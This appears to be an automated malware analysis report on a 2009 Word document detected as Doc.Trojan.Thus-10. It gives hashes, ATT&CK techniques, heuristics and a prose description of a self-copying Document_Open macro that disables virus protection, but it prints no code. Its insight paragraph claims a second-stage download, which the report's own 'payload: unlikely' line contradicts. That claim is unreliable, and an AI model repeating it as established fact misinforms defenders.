Office (OLE) / .DOC malware analysis — malicious · 5e32bf2f72825bf0

MALICIOUS

Office (OLE) / .DOC

68.0 KB Created: 2009-09-01 14:32:00 Authoring application: Microsoft Word 11.2

MD5: 93bac305599355e3210c0192551cdc1f SHA-1: 3f4d6252139335142fea267846b2c55294155dea SHA-256: 5e32bf2f72825bf020cd3b925b93e3bd5a4568750029a6e949bd9ae7a17c96e7

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro that is triggered by the Document_Open event. The macro attempts to disable virus protection and copy itself to the Normal template, likely to establish persistence or facilitate further execution. The ClamAV detection 'Doc.Trojan.Thus-10' strongly indicates malicious intent, suggesting the macro is designed to download and execute a second-stage payload.

Heuristics 4

ClamAV: Doc.Trojan.Thus-10 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Thus-10
ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV

ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `2fdc9ff946bf1d1689e70a56afb8108046dc72df071fb69dc261414c52d254e0`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2370 bytes
Detection ClamAV: Doc.Trojan.Thus-10 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.